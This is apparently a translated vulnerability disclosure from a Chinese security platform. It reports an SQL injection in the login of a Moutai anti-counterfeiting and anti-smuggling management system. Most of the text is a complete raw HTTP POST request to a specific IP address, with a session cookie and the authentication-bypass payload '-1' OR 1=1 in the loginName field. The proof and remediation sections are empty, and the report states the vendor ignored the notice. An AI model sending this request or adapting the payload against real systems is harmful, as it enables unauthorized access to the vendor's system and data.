Vulnerability title: SQL injection vulnerability in the Moutai e-commerce anti-counterfeiting and anti-smuggling management system
Vendor: Emaotai.cn
Author: 过路人
Submitted: 2016-06-18 19:12
Published: 2016-06-26 09:00
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 11
Status: The vendor was notified of the vulnerability but ignored it
Tags:

Vulnerability details:

POST /index.php/welcome/index HTTP/1.1
Content-Length: 91
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://202.98.213.133/
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%224450a12d480df3d68e78d987a6e82f4b%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22124.114.79.236%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1466073468%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D92a6bd6f977b2ad7ca38653a091cf7be
Host: 202.98.213.133
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

loginName=-1' OR 1=1 * - &loginPwd=hbwnjcpe&postFlag=1

Proof of vulnerability:

Remediation:

Copyright notice: Please credit the source when reposting. 居民A @乌云